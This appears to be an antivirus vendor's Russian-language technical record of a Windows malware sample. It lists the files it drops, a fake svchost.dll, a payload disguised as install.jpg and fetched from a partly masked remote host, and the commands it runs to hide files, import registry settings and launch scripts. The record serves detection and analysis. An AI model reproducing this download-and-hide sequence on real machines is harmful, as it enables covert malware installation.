Техническая информация
- 'C:\hosts\install.exe'
- '%TEMP%\cache\svchost.dll' http://el##r.wc.lt/server/install.jpg
- '%TEMP%\install.exe' -pqewrfdhbgfjtjdt6ujedrsgt3fwsetg5e6hsdhjf
- 'C:\hosts\install.exe' (загружен из сети Интернет)
- '<SYSTEM32>\svchost.exe'
- '<SYSTEM32>\ping.exe' -n 20 localhost
- '<SYSTEM32>\attrib.exe' -h -s %TEMP%\cache\*.*
- '<SYSTEM32>\reg.exe' import 111.reg
- '<SYSTEM32>\wscript.exe' "%TEMP%\cache\cache.vbs"
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\cache\cache.bat" "
- '<SYSTEM32>\attrib.exe' +h +s "C:\\hosts"
- %TEMP%\cache\cache.bat
- %TEMP%\cache\install.jpg
- C:\hosts\install.exe
- %TEMP%\install.exe
- %TEMP%\cache\svchost.dll
- %TEMP%\cache\cache.vbs
- %TEMP%\cache\cache.vbs
- %TEMP%\cache\svchost.dll
- %TEMP%\cache\install.jpg
- %TEMP%\cache\svchost.dll
- C:\hosts\install.exe
- %TEMP%\cache\cache.vbs
- 'el##r.wc.lt':80
- el##r.wc.lt/server/install.jpg
- DNS ASK el##r.wc.lt
- ClassName: 'Shell_TrayWnd' WindowName: ''
- ClassName: 'EDIT' WindowName: ''